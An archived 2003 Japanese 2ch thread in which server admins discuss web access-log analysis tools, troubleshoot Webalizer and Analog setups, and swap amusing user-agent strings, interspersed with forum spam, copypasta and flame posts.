2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

アクセスログ解析

1 :DNS未登録さん:03/05/23 16:43 ID:66Evzh7x
ログ解析について語りませんか?
変なAgentがあったとか、謎のリクエストなど

あと解析ソフトもね。オレはサーバー上で解析する気は無いので
ApacheLogViewerというのを使ってるよ、これは凄い
速いし高機能だしお奨めだ。

2 :DNS未登録さん:03/05/23 16:49 ID:JCfeb53J
2?

3 :DNS未登録さん:03/05/23 16:50 ID:sqlZx4Fz
私もApacheLogViewer使ってます
質問なんですが、これって何ですか?
"","-",-,"","-",408,0,"-","-"
default.ida","XXXXX
"-",HEAD,"/","-",200,0,"-","-"
"","-",GET,"http://www.yahoo.com/","-",200,1726,"-",
下の2つは200なので気になるんですけど

4 :DNS未登録さん:03/05/23 16:55 ID:ZRRl9EEG
この間、アクセス解析してたら素敵ングブラウザに出会いました

5 :DNS未登録さん:03/05/23 17:18 ID:???
Postfixのログを解析するソフトを教えてください。

6 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/23 20:40 ID:???
analogで十分。

7 :DNS未登録さん:03/05/23 21:43 ID:???
ApacheLogViewerなんだけど、初めは愛用してたけど、今はWebAlizerだなぁ。
だってLogViewerだと読み込んで表示されるのに15分ぐらいかかるんだもん。
日/40万リクで、一週間分となるともう絶望的。



8 :DNS未登録さん:03/05/24 01:27 ID:???
>>7
analogとWebAlizer併用が最強

9 :DNS未登録さん:03/05/24 01:30 ID:???
ルータのログ解析にclscanとfwlogwatch使ってます

10 :DNS未登録さん:03/05/25 23:08 ID:???
AWStatsが結構見やすくて良いッス

11 :山崎渉:03/05/28 17:04 ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

12 :DNS未登録さん:03/05/30 06:32 ID:Z9dUcAJg




1の母です1の父です1の兄です1の弟です1の姉です1の妹です1の祖父です
1の祖母です1の伯父です1の伯母です1の叔父です1の叔母です1の曾祖父です
1の甥です1の姪です1の従兄です1の従姉です1の従弟です1の従妹です
1の曾祖母です1の息子です1の娘です1の孫です1の曾孫です1の玄孫です
1の消防時のクラスメイトです1の消防時の担任です1の卒業消学校の校長です
1の今(厨房時)のクラスメイトです1の今の担任です1の現厨学校の校長です
1の家臣です1の御家人です1の右大臣です1の左大臣です
1の主治医です1の看護婦です1の入院している病院の院長です
1の背後霊です1の家に居る呪縛霊です1の先祖です1の家の仏壇です
1の使用ストUキャラです1がやってるDQの主人公です1がやってるFFの主人公です
1のエクソシストです1の占い師です1の体内に金属片を埋めた宇宙人です
1のPCです1のMOです1のマウスです1のキーボードです1のプリンターです
1の精子です1のティムポです1のチン毛です1のティムポの皮です1のティンカスです
1が毎日オナーニする時に使っている布です1の胸毛です1の脇毛です1の鼻毛です
1のツアー添乗員です1を泊めた宿の主人です1を泊めた宿の女将です
1の先輩です1の後輩です1を轢いたトラックです1を中央線三鷹駅で轢いた電車の運転士です

 今 回 は 1 が こ の よ う な ス レ ッ ド を 立 て て し ま い 誠 に 申 し 訳

 ご ざ い ま せ ん。 こ の 板 の 住 人 の 方 々 に 深 く お 詫 び し ま す。



13 :DNS未登録さん:03/05/30 07:00 ID:m7Ux4xah
ネット上で自分の分身キャラ「アバター」を作って楽しくコミュニケーション
無料登録すると、もれなく商品券とメールアドレスが貰えます!!         
http://f15.aaacafe.ne.jp/~suikas/cafe.html

14 :直リン:03/05/30 07:10 ID:9hpAtb09
http://homepage.mac.com/yuuka20/

15 :DNS未登録さん:03/05/30 10:47 ID:j4qrs68+
サーバーはIISで、50以上あるサイトのアクセス数レポートを、
毎月1回お客さんにメールで送ってるんだよ。
で、アクセス解析ソフトをこれまで「WebLOG」っていうフリーソフトを使ってたんだが、
もうパワーの限界がきてる。
サーバーに負荷をかけたくないからクライアントで動作して、
なおかつ定期的に50以上のサイトのログを一気に解析してくれるようなソフトありませんかね?
今あたりをつけてるのは「NetIntellect」とかいうソフト。
どうなんだろ?

16 :DNS未登録さん:03/05/30 11:07 ID:???
有料でもいいならWebTrend

17 :16:03/05/30 11:08 ID:???
あとは解析用の鯖を別にする。

18 :直リン:03/05/30 11:10 ID:9hpAtb09
http://homepage.mac.com/yuuka20/

19 :15:03/05/30 11:28 ID:j4qrs68+
>16
おーすげー!
レポートを自動でメールで送ってくれるみたいだ!
まさに待ち望んでたものかも。

しかしgoogleしたところ、
二つの会社がやってるみたいだ?
どう違うんだ?
http://www.xlsoft.com/jp/products/webtrends/price.html
http://www.terilogy.co.jp/product/security/webtrends/analysis.htm

20 :16:03/05/30 12:03 ID:???
>>19
販売代理店が複数あるってだけ。
昔は日本語マニュアルがショボくて大変だったけど今はだいぶマシになったんじゃないかな。
Ver5.5使ってた経験から参考意見。

・けっこう初期設定(レポートのポリシー作成)はめんどい。
 これはバージョン関係ないと思う。
・ログの件数にもよるんだけど、サーバ側で日付変更線のタイミングで
 ログ分割&圧縮かけといたほうがいいかも。
・HTML出力でもけっこう見やすいけど、Excelで出力できるのは
 提出資料作成するのに便利だった(それをメールで送れるし
・サイト上にHTML出力もできるのでベーシック認証でもかけて
 クライアントに公開するって手もありかも。
・今のバージョンだと日付選択がすげー楽になった(5.5はリスト化機能なかった)。

って感じ。

21 :15:03/05/30 12:56 ID:j4qrs68+
>>・HTML出力でもけっこう見やすいけど、Excelで出力できるのは
>> 提出資料作成するのに便利だった(それをメールで送れるし
>>・サイト上にHTML出力もできるのでベーシック認証でもかけて
>> クライアントに公開するって手もありかも。
同じような仕事してるっぽくて参考になります。
とりあえず資料請求しときました。

22 :動画直リン:03/05/30 13:10 ID:9hpAtb09
http://homepage.mac.com/hitomi18/

23 :_:03/05/30 13:15 ID:???
http://homepage.mac.com/hiroyuki43/jaz01.html

24 :16:03/05/30 13:27 ID:???
レポートのポリシー作成しっかりやっとけば、
見栄えなんかもかなりカスタマイズできるよ。

>同じような仕事
ポータルサイトの鯖缶だったんで広告の出向元に出す資料作成とか。
クリックレートや訪問者分析とかまで必要になると
WebTrendに限らずサーバログの解析じゃ不可能なんで
CGIでもなんでも、クッキー使って独自にログ生成しないと無理。
その場合自鯖だと負荷デカすぎるので、
別鯖にログ生成&解析は処理させるのが一般的じゃないかな。

最初からこれ張ればよかった。
http://www.gamiras.com/admin/analyz/04.html

これ以上は板違いかな。Web制作/WebProg板?

25 :DNS未登録さん:03/05/30 13:41 ID:???
ヤプーは毎日10億行のヒットログがある。
64bit鯖で6時間掛けて解析して、広告主にレポするとか。


26 :DNS未登録さん:03/06/09 13:55 ID:???
WebTrends欲しいけど、個人じゃちょっと買えないよなぁ。
理想を言えばオープンソースで無償で入手できる似たような解析ソフトが欲しい。


27 :16:03/06/10 13:27 ID:???
商用だとWebTrendかNetintellectのどっちかだろな・・・
国産でASPではなくいい解析ソフトとかないのかな。

28 :DNS未登録さん:03/06/12 02:04 ID:???
コピーされちゃうからね。

WebTrendは固有IDがあるしなぁ。

29 :DNS未登録さん:03/06/13 14:25 ID:???
AWStatsは日本語いけるよ。

30 :DNS未登録さん:03/06/15 21:52 ID:iE6mWtYg
apacheのログを毎日ローテートしてるんですが
Webalizerで全部のログを解析するには
LogFileにどのような指定をすればいいですか?
現在 /var/log/httpd/access_log.* としていますが
どうやらワイルドカードが使えないらしく駄目でした。
Analogはこれで処理できたんですが・・・。

ログは日毎に、access_log.20030613のようになってきます。

31 :DNS未登録さん:03/06/15 22:00 ID:???
Quid Pro QuoとAnalogなんだがどうやって設定していいのか分からず鬱になり挫折した日を思い出す…

32 :DNS未登録さん:03/06/15 22:13 ID:rrNAenRc
port434,435,1434って何に使ってんだ?
変なアクセスログ残ってるけど、ネットで調べても該当するものが見つからん


33 :DNS未登録さん:03/06/15 22:15 ID:???
>>32
mobileip-agent 434/tcp MobileIP-Agent
mobileip-agent 434/udp MobileIP-Agent
mobilip-mn 435/tcp MobilIP-MN
mobilip-mn 435/udp MobilIP-MN
ms-sql-m 1434/tcp Microsoft-SQL-Monitor
ms-sql-m 1434/udp Microsoft-SQL-Monitor

34 :DNS未登録さん:03/06/15 22:23 ID:???
>>30
/var/log/httpd/access_log.20030613
/var/log/httpd/access_log.20030612
/var/log/httpd/access_log.20030611
と、新しい順に

35 :DNS未登録さん:03/06/16 00:49 ID:???
不正アクセスの発信地の国別統計をとろう!
ttp://www.mtl.t.u-tokyo.ac.jp/~nminoru/memo/ip-address/what_country_from.html

36 :DNS未登録さん:03/06/16 21:22 ID:16NrwGv5
AN HTTPDのログ解説ソフトって無いの?

37 :DNS未登録さん:03/06/16 21:24 ID:???
ログを解説するソフトか。。
難しい事を言いますね

apachelogviewer簡単だから使えば?

38 :DNS未登録さん:03/06/17 00:50 ID:???
AnHttpdのログをapache互換の形式に変換してくれる素晴らしいPerlスクリプトとかが
あれば……とっくに有名になってるか。

39 :DNS未登録さん:03/06/17 00:52 ID:???
Analogでも設定すれば使えるんじゃないの?
ttp://jp.analog.cx/jp5.24/logfmt.html

40 :DNS未登録さん:03/06/17 00:55 ID:???
ANならアクセス多いわけないんだから
>>37使えばいいでしょ
そのまま使えるんだし

41 :DNS未登録さん:03/06/17 02:56 ID:???
>>38
ANHTTPdで採用されてるのは
世界標準のcommon形式だが・・・
Apacheでも同じだろ?

42 :損権厨房 ◆mVeUbtZCI. :03/06/18 19:43 ID:UZTfDoxT
>>31
QQPの設定の所でアクセスログの記録方法ってあるだろ?
そこでcommonなりcombineなり好きなのを選べば良い
あとたまったログをAnalogにDDすればできると思うぞ

やったことはねーけどな

43 :損権厨房 ◆mVeUbtZCI. :03/06/18 19:43 ID:???
すまん、間違えた
逝って来ます

44 :_:03/06/18 20:45 ID:???
http://homepage.mac.com/hiroyuki44/

45 :直リン:03/06/18 22:10 ID:rIOl8jgG
http://homepage.mac.com/yuuka20/

46 :DNS未登録さん:03/06/19 20:48 ID:???
>>42
最初Commonで試したらうまくいったんだけど漏れの場合ログの書式が
04/09/317:22:07OKahya.gorua.org/index.html1133Mozilla/3.0GEThttp://REFERER
と2桁の年/月/日(タブ)時:分:秒(タブ)OKかERR(タブ)アクセス元ホスト(タブ)要求
されたファイル(タブ)転送バイト数(タブ)UA(タブ)ステータス(タブ)あればリファ

ってなっててそれを変えたくなかったのでいろいろ苦戦して挫折したんですYO…。あぁ…。

47 :DNS未登録さん:03/06/23 00:34 ID:7Sxj9qmI
アクセスログ解析すると何がわかるんだ?
ヒッキーが日中に頻繁にアクセスしてるぞ、とか
掲示板でいつもコピペ荒らししてるのはこいつだ、とか
その位しか分からないだろ?

他になんかいい活用法あるのですか
誰か教えてちょんまげ

48 :DNC未登録さん:03/06/23 00:55 ID:BClIUmWj
FreeBSD ipfwに使えるフリーの解析ソフトある?
fwlogwatch使ったことないけど、ipfwでも使えるのかな。

49 :DNS未登録さん:03/06/23 07:59 ID:???
>>47
ある程度混み合って来た時、サーバーの負荷を見る時ぐらいしか役に立たないな。
しかも事後だから即応性はないけどね。

あと、403とか401とか500とか503とかそういうエラーコードが出てないかチェックする事ぐらいか。


50 :DNS未登録さん:03/06/24 22:00 ID:???
>>47
そういった用途しかピンとこないお前のようなヤシには
アクセス解析などという言葉は無縁だということだ。

51 :DNS未登録さん:03/06/24 22:42 ID:???
>>50
じゃあ、君はどうアクセス解析してるの?後学のために訊かせてね。


52 :DNS未登録さん:03/06/24 23:25 ID:???
>>51
お前みたいなキモイやつがアクセスしてないか
調べるためだよ。

53 :DNS未登録さん:03/06/24 23:31 ID:???
>>50,52 のような揚げ足厨が一番キモイのだが・・・
こう言う奴のアクセスを調べて、
度が過ぎる場合に規制をかけるのは意味がありそうだな。

54 :DNS未登録さん:03/06/24 23:36 ID:???
最初から素直に教えてくださいって言えばいいのに

55 :DNS未登録さん:03/06/24 23:37 ID:???
>>53
お前やっぱりキモイわ(w

56 :DNS未登録さん:03/06/25 00:07 ID:???
>>53
おいお前、相変わらず必死だな。

57 :DNS未登録さん:03/06/25 00:09 ID:???
>>53
よかったな。
アクセス解析の目的の1つは理解できたじゃないか。
めでたいめでたい、皆の衆、赤飯炊いて祝おうではないか。
リア消卒業ぢゃて。ギャハ。

58 :DNS未登録さん:03/06/25 00:11 ID:???
>>53
いいかげん寝ろよ。
明日も早いんだろ?

59 :DNS未登録さん:03/06/25 00:13 ID:bE/AxaMj
この板もID強制表示した方がいいな。

60 :DNS未登録さん:03/06/25 00:17 ID:???
>>59
あまり意味ないと思われ。
IP変えればIDも変わるからね。
IP変えるなんて簡単だしさ。。。

61 :DNS未登録さん:03/06/25 00:37 ID:???
この板は固定IPの人が多いから

62 :DNS未登録さん:03/06/25 00:47 ID:???
ダイヤラーがいれば無意味

63 :DNS未登録さん:03/06/25 00:56 ID:???
ダイヤラーはIP強制表示だな。
IPが多少変わっても自作自演は分かるだろ。
クッシーは弾けばいいし。

64 :DNS未登録さん:03/06/25 06:04 ID:???
>>57
なんか、頭でっかちが紛れ込んでるな。


65 :DNS未登録さん:03/06/25 11:10 ID:???
おまいらもちつけ

66 :DNS未登録さん:03/06/25 12:35 ID:???
結局アクセス解析なんてキモイオタの自己満足なんだろ?
誰もまともに説明できないし。

67 :DNS未登録さん:03/06/25 12:56 ID:???
>結局アクセス解析なんてキモイオタの自己満足なんだろ?

とでも書けば、誰か説明してくれるとでも思ったのか(w

68 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/06/25 13:18 ID:???
自己満足にならないようにするための材料にするのがアクセス解析じゃないの?

69 :DNS未登録さん:03/06/25 18:40 ID:???
>>67
うまい!

70 :DNS未登録さん:03/06/25 18:59 ID:wfI9oVW0
超過激ライブチャット登場!!!!!

あなたの命令で若い娘たちがヌレヌレモードへ

☆★アメリカ西海岸発☆★モザイクなし☆★☆★
・・・・・
あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております!

ただいま、10分間無料で体験できるほか7日間会費無料!!

http://www.gals-cafe.com

71 :DNS未登録さん:03/06/25 19:11 ID:???
正直、このスレッドをアクセス解析してみたいね。
煽りの殆んどは同一人物の予感・・・・

72 :DNS未登録さん:03/06/25 21:20 ID:0mc6VtBd
エロりんく
http://www.k-514.com/html/erolink.html

73 :DNS未登録さん:03/06/26 02:37 ID:???
最近Analogとdnstran使い始めてみたんですが、いつのまにかaccess_log.swpとかいうファイルがApacheのログディレクトリにできてました。
これってなんでしょう? 中身はバイナリのようです。
LOGFILE access_log* としてるとそのファイルまで引っかかって毎回エラー吐くのでなんとかしたいんですが。

74 :DNS未登録さん:03/06/29 13:14 ID:???
ReportMagicをWin32で、グラフ中の文字列が化けない方法って無いでしょうか。
FontでMS UI Gothic等を指定しても見事に化けます

75 :DNS未登録さん:03/07/03 03:09 ID:???
NetBSD1.6, Apache、で細々と鯖遊びしています。
先月分のlogをAnalogで調べたらドメインレポートのところに
.mil (米国軍事機関)
ってのがあって、ちょっとドキッとした。

76 :山崎 渉:03/07/15 11:10 ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

77 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 05:04 ID:???
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

78 :DNS未登録さん:03/08/05 00:03 ID:db8NSOVu
こういうagentがありましたよw
"bakajane-no"

79 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/08/05 00:07 ID:???
>>78
http://www.gamiras.com/misc/20030805.gif

80 :DNS未登録さん:03/08/05 00:09 ID:???
user agentを書き換えて遊ぶ馬鹿は(ry

81 :DNS未登録さん:03/08/05 16:57 ID:???
>>80
逝ってよし、でつか。

漏れのはブラウザのUAの後ろに/Monagatorってつけてたりする
(ブラウザを2ちゃん風に改造したしw)

82 :DNS未登録さん:03/08/05 17:39 ID:Tb8gLAoY
IE    90%
NS    7%
その他 3%

なもんじゃないか。
その他に何が入ってるのか見る気にもならん

83 :DNS未登録さん:03/08/05 18:17 ID:???
>>82
携帯電話ブラウザかテキストブラウザ…まあそんなとこだと思われ

84 :DNS未登録さん:03/08/05 19:02 ID:???
>>83
Operaも・・・

85 :DNS未登録さん:03/08/05 22:10 ID:???
うちのアクセスログにこんなん在ったぞ

Mozilla/3.0 (DreamPassport/3.0)
Mozilla/3.0 (DreamPassport/3.15; SEGA/VF.NET)
Mozilla/3.0 (DreamPassport/3.15; SONICTEAM/PSOV2)
Mozilla/3.0 (DreamPassport/3.2)
Mozilla/3.0 (Planetweb/v1.06 Build 141; SPS JP)
Mozilla/3.0 (Planetweb/v1.54; SPS JP)
Mozilla/3.0 (compatible; PerMan Surfer 3.0; Win95)

うそくさ

Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; Yahoo! JAPAN Version Windows 95/NT CD-ROM Edition 1.0.)
これはちょっと笑ったけど:D

86 :こんなのありました:03/08/05 22:13 ID:???
? (Zeonic/0079(CharCustom; YMS-14; Gelgoog;))
? (SpaceBison/0.01 [fu] (Win67; X; ShonenKnife))

87 :DNS未登録さん:03/08/05 23:31 ID:???
arpaってのもある。


88 :DNS未登録さん:03/08/06 01:17 ID:???
>>86
SpaceBisonはProxomitronの古いバージョンでUser-Agent偽装に使われてたやつ

89 :DNS未登録さん:03/08/06 06:57 ID:???
Proxomitronってなんかリファに少年ナイフのサイトのURL残して行くやつだったっけ?

90 :DNS未登録さん:03/08/06 14:46 ID:???
それで少年ナイフ関係から苦情来てもうやめたらし

91 :DNS未登録さん:03/08/06 18:22 ID:???
>85
>Mozilla/3.0 (DreamPassport/3.0)
>Mozilla/3.0 (DreamPassport/3.15; SEGA/VF.NET)
>Mozilla/3.0 (DreamPassport/3.15; SONICTEAM/PSOV2)
>Mozilla/3.0 (DreamPassport/3.2)

これはSEGAのゲーム機ドリームキャスト(DC)からののアクセスだな
通信可能なゲームにいくつかブラウザが付いてるのもある
OSはWindowsCEだったような気がする

92 :85:03/08/06 23:55 ID:???
>>91
いや知ってるけど…
問題は*未だに使ってる奴いるのかよ* って事で
#そおいやぁDCだけで作ったWebページとかDCでチャットしてるつわものとか居たなぁ


93 :DNS未登録さん:03/08/07 07:15 ID:???
まあ無理矢理使ってる理由の中にゲーム機だからウイルスに感染しねーダロってのをどっかの本かなんかで見た

94 :山崎 渉:03/08/15 22:40 ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

95 :DNS未登録さん:03/09/18 04:37 ID:???
保守った方がいいのかな。


96 :DNS未登録さん:03/09/18 10:57 ID:???
ネタないけどな

97 :DNS未登録さん:03/10/07 06:26 ID:4uI+725O
ちちんぷいぷい

98 :DNS未登録さん:03/10/07 13:07 ID:???
ぷるるんぷるん

99 :DNS未登録さん:03/10/08 07:34 ID:???
馬鹿ばっか

100 :DNS未登録さん:03/10/08 11:59 ID:???
あなたの一番になりたい

101 :名無しさん:03/10/09 14:45 ID:/LimsyLa
ブラウザからのアクセスとダウンローダーからのアクセスの
見分け方は?

102 :DNS未登録さん:03/10/09 14:58 ID:???
>>101
勘と経験から判断

103 :DNS未登録さん:03/10/09 18:43 ID:???
>>101
UAから判断できることが多いが偽装している場合は経験から…(ry
例えば数十のファイルをほぼ同時にダウソ開始とか

104 :名無しさん:03/10/14 20:09 ID:???
ふう・・・知ってる人でもたぶん教えてくれない
だろうなあと思ってました。

バラしたらその裏をすぐかかれますから。
モームス画像の大量ダウンロードはあきらめ、
こつこつ一つずつ落とすことにします。

105 :DNS未登録さん:03/10/14 20:57 ID:???
>>104
ヽ( ゚д゚)ノバーヤ

106 :DNS未登録さん:03/12/16 09:00 ID:???
にゅう

107 :DNS未登録さん:03/12/17 23:26 ID:aO0ZtV2J
知人に2ちゃんねるに出入りしてることを隠しておきたいんだが、
知人のホムペ行く前に接続しなおしたらログ解析されない?

108 :DNS未登録さん:03/12/18 00:22 ID:???
( ゚д゚)ポカーン

109 :DNS未登録さん:03/12/18 03:51 ID:???
>>107
その知人のとこは2chで晒されまくっとるのですか(わ


110 :DNS未登録さん:03/12/18 05:19 ID:72gsME6T
>>109
なぜ?ごく一般のページです。
リアル知人でもあるから隠しておきたいだけですよ。
再接続で出来るなら。

111 :DNS未登録さん:03/12/18 05:29 ID:???
>>110
リファラばぐ付きのIE使ってなけりゃ大丈夫再接続なんかせんでも大丈夫




112 :DNS未登録さん:03/12/18 05:38 ID:???
アクセスログ見ると未だにありえないサイトのURL入ったリファラがたまに残ってたりするんだけど、
あのバグって直ってるの?

113 :DNS未登録さん:03/12/18 05:54 ID:???
まだ治ってへんちゃうの?
未だにいっぱいあるもん。
リファラーに画像のURLがあったりするし。


114 :DNS未登録さん:03/12/18 06:05 ID:???
そのありえないのが入ってる奴のブラウザは何になってるよ?


115 :DNS未登録さん:03/12/18 23:46 ID:???
>>111
例えばお気に入りに2chを入れてた場合、2chの次に知人Aのホムペ訪問。
知人A「こいつ2chネラーかよ!」となるかと思ってた訳ですよ。
アクセスログって自分のホムペにアクセスした人が、どのサイトから来たとか
お気に入りは何なのかとか把握されるものかと思ってたんだけど違うのかな。

116 :DNS未登録さん:03/12/18 23:55 ID:???
>>115
それは本来はリンクをたどったときだけブラウザーが送るリファラーでわかるもの

ブラウザがバグってた時に特定の手順を踏むとリンクしてないのにそれまで表示してたページがリファラになってしまうというのがあった
IE6では直ってることになってるんだが >>112 >>113 のログに残ってるブラウザの種類に興味津々


117 :DNS未登録さん:03/12/19 00:41 ID:???
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 


厨カエレ

118 :DNS未登録さん:03/12/19 02:29 ID:???
俺の解析にゃ2chのスレがリファになったヤシがたまにある。
殆どのヤシはime.nu経由で元スレが解からないが、何百件に1件は
リファ引っ下げてアクセスしてくるヤシがいるって事。
で、そのスレにアクセスするとURLはh抜きで書かれているのね。
確かIE5.0以降に多いんじゃなかったっけか?
ほれ、直前まで見ていたページが次に表示したページに対するリファに
なっちまうバグ。今のIE6.0にはこのバグは完全になくなっていると聞いたが。

119 :DNS未登録さん:03/12/19 04:12 ID:???
>>118
IE5だか5.5のばぐっしょ
だからそのログのユーザーエージェントは何になってんのよ?
って、もしかしてユーザーエージェントをログって無いのか


120 :118(だが112や113とは別人):03/12/19 05:00 ID:???
何故そげに知りたがるのか、それが知りたいんだが。

121 :DNS未登録さん:03/12/19 05:39 ID:???
>>120
もしIE6が混じってたらバグが直ってないということだから


122 :DNS未登録さん:03/12/19 06:52 ID:???
知りたいっつーても最近ので一月も前だからなぁ、覚えてないよ。
ゴメソ。
でもIE6.0じゃなかった事は覚えてる。

123 :DNS未登録さん:03/12/19 07:13 ID:???
>>117
初心者板から来たが、おまいDQN?

124 :DNS未登録さん:03/12/19 07:17 ID:???
>>123
どのスレよ?

125 :DNS未登録さん:03/12/19 08:41 ID:???
>>123
まー同じ単語を列挙するヤシは2chのいたる所に蔓延っているが、みなDQNだ。
つかそんな事誰でも知ってるからあえて言う必要もないのに。。。

126 :DNS未登録さん:03/12/19 08:47 ID:???
>>124
ほれ
http://etc.2ch.net/test/read.cgi/qa/1071779441/

>>125
みなDQN?からかう為に使う奴もいるだろ。

127 :DNS未登録さん:03/12/19 14:05 ID:???
>>126
凄い偶然だな。本当に115じゃないのか?

99 :ひよこ名無しさん :03/12/19 06:55
マジ質問です。
2chではホームページのことを何と書けば叩かれないんですか?

102 :2ワラタ ◆BZSHO/ubtg :03/12/19 06:56
普通に叩かれないだろw
「ホームページ」でおk。

104 :ひよこ名無しさん :03/12/19 06:56
>>102
ご回答ありがとう。じゃあHPはどうですか?

105 :高校性コテ@クリスマスまであと5日 ◆KOKOrp6.b6 :03/12/19 06:56
>>99
普通にホームページだな
2chっぽくHPとか書くと逆に叩かれる(笑

108 :ひよこ名無しさん :03/12/19 06:57
>>105
んー・・・じゃあホムペはどうですか?

111 :ひよこ名無しさん :03/12/19 06:57
>>99
そんなんで叩いてるアホは無視しろ。
ウェブサイトとでも言っとけ。

116 :2ワラタ ◆BZSHO/ubtg :03/12/19 06:58
ホームページの言い方一つで叩いてくるような香具師はさすがにいないと思うからなんでもおk

120 :ひよこ名無しさん :03/12/19 06:59
>>111 >>116
ありがとう。感謝します。

128 :DNS未登録さん:03/12/19 14:05 ID:???
122 :まこと 3さい ◆siA2qltSFw :03/12/19 06:59
ホームページ、ホムペ、HP、ウェブサイト、サイト

125 :ひよこ名無しさん :03/12/19 07:00
>>99

馬鹿じゃねぇのwwwwwwwホームページだってよぉwwwwwwwwww

138 :ひよこ名無しさん :03/12/19 07:03
>>120
おまいまさか、このスレの奴じゃねーだろうな?
http://pc2.2ch.net/test/read.cgi/mysv/1053675792/l50

そこの117でホムペと書いた奴が叩かれてるんだが。

151 :ひよこ名無しさん :03/12/19 07:07
>>138
違いますよw
そんな人もいるんですねぇ…やっぱりウェブサイトかな。

158 :ひよこ名無しさん :03/12/19 07:09
>>151
それでいいだろ。しかしさすが自作PC板だな。


117 :DNS未登録さん :03/12/19 00:41 ID:???
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 


厨カエレ

164 :ひよこ名無しさん :03/12/19 07:11
>>158
自作PC板?自宅サーバーだろ

166 :ひよこ名無しさん :03/12/19 07:12
>>164
あ、本当だ・・・。自宅サーバーのほうが厨は多そうだがな。


最後がまた凄い偏見

129 :DNS未登録さん:03/12/19 19:24 ID:???
ホムペとか言ってる厨が大量に釣られてるな

130 :DNS未登録さん:03/12/19 21:23 ID:???
かっこわりぃ奴だな・・・

131 :DNS未登録さん:03/12/19 21:42 ID:???
なんかさ、ちょっとだけなんか詳しい奴って、物凄いカタルのな。
オレなんかそんなののせいで会社クビになったよ。でもオレ、クビになる前に数千万
手にしたから何とかなってるけどさ。これからどうしようかな。。。

132 :DNS未登録さん:03/12/20 05:08 ID:???
大量杉
いつからこんな厨ばかり増えたんだかな

133 :DNS未登録さん:03/12/20 06:07 ID:???
厨(>>117)が厨(123以後)を呼んだか・・・割と良スレだったのになぁ

134 :DNS未登録さん:03/12/20 06:08 ID:???
ちょっとだけ詳しいやつは自分の知ってることが全てだとおもってて、内容もすぐ語り尽くせちゃうからすぐ語る
詳しく分かってくるとだんだん一口で語れなくなってくるからよっぽど暇じゃないと口出ししなくなって
傍目にはよくわかってない奴みたく見えてくる(笑


135 :DNS未登録さん:03/12/23 21:30 ID:D2UuBeaM
Analogって過去のデータを蓄積しないの?
なんかログファイルがある分しか解析されて無いみたいなんだけど。

現在、一日ごとにログファイル切り出してるんだけど、数年のデータ見るには
365x年数分のファイルを毎回処理しなければならないって事ですか?

136 :DNS未登録さん:03/12/23 23:00 ID:???
多分そうだろ。
つかオプションとかあるんじゃねーのかな?

137 :DNS未登録さん:03/12/25 06:00 ID:???
>>135
過去の集計データを保存するオプションがあったはづ。
漏れはWebalizer使いだが、Webalizerにもあるよ。


138 :DNS未登録さん:03/12/25 06:10 ID:???
>>137
そのイカれた日本語なんとかしてくれ

139 :DNS未登録さん:04/01/15 04:48 ID:???
139

140 :DNS未登録さん:04/01/27 23:03 ID:???
140

141 :DNS未登録さん:04/02/04 01:24 ID:???
Webalizerですが、なぜかログの保存場所
(例えばhttp://localhost/usage/)にアクセスしても白紙の画面で
個々のファイルにアクセスしないと解析が表示されません。

どうしてかわかりませんか?

142 :DNS未登録さん:04/02/04 02:22 ID:???
わかるけどおしえない

143 :DNS未登録さん:04/02/04 02:31 ID:???
>>141
WebalizerじゃなくてApacheの設定?

144 :DNS未登録さん:04/02/04 10:43 ID:???
>>143
Apacheの設定とは?

145 :DNS未登録さん:04/02/15 19:57 ID:???
みなさん、usageはフォルダ名は変えてますか?

146 :DNS未登録さん:04/02/16 01:39 ID:???
>>141
亀レスだけど、IE使ってるなら エンコード→自動選択 してみれ。

147 :DNS未登録さん:04/02/16 01:40 ID:???
ちなみに>>145
漏れは /webalizer/ にしてるなあ。

148 :DNS未登録さん:04/02/27 14:30 ID:jBxdVAfP
webalizerと同等、またはそれ以上の機能があり
(HTML以外の画像ファイルなどに貼られたリンクをユーザーがクリックした数もわかる)
かつwebalizerよりもサーバー負荷が小さいアクセス解析ソフトがありましたら
教えてください。

OS:FreeBSD4.8
www:Apache2.x


149 :DNS未登録さん:04/02/27 15:07 ID:UpX88eng
>>145
フォルダ名は変えてないけどLan内からしか見られない設定してまつ。

150 :DNS未登録さん:04/02/27 17:05 ID:???
上に同じ

151 :DNS未登録さん:04/02/27 21:54 ID:???
>>148
WebAlizerが一番負荷が軽いと思うのだが。


152 :DNS未登録さん:04/02/28 14:03 ID:M4M39N/Y


